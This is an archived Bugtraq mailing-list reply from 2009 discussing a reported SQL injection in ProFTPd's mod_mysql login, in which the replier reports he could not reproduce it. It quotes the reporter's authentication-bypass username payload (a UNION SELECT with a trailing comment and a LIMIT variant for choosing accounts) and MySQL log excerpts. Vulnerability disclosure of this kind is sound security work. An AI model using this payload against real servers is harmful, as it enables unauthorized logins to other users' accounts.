Bugtraq mailing list archives

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

From: Daniel Mayer <mayer () couga net>
Date: Tue, 10 Feb 2009 17:12:17 -0500

Hi,

On Tue, 2009-02-10 at 19:49 +0000, gat3way () gat3way eu wrote:

Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with 
username like:

Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 

and a password of "1" (without quotes).

which leads to a successful login. Different account logins can be made successful using the limit clase (e.g 
appending "LIMIT 5,1" will make you login with as the 5th account in the users table).

As far as I can see in the mysql logs the query becomes:
SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 
1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1

I can see proper escaping even when varying the SQL code provided. Here
the MySQL log excerpt:

SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
(username='USER%\') and 1=2 union select 1,1,uid,gid,homedir,shell from
ftp; --') LIMIT 1

SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
(username='USER %\') and 1=2 union select 1,1,uid,gid,homedir,shell from
ftp; --') LIMIT 1

SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
(username='% \') and 1=2 union select 1,1,uid,gid,homedir,shell from
ftp; --')  LIMIT 1

SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
(username='%\') and 1=2 union select 1,1,uid,gid,homedir,shell from ftp;
--') LIMIT 1


I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid 
format string things?).

Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.

Did you inform the developers directly? I would be happy to get an
update on this issue. 


Best,
Daniel

Current thread:

Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) gat3way (Feb 10)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Daniel Mayer (Feb 10)
  - Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Shino (Feb 11)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Sergio Aguayo (Feb 11)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Edward Bjarte Fjellskål (Feb 11)
- <Possible follow-ups>
- Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) gat3way (Feb 11)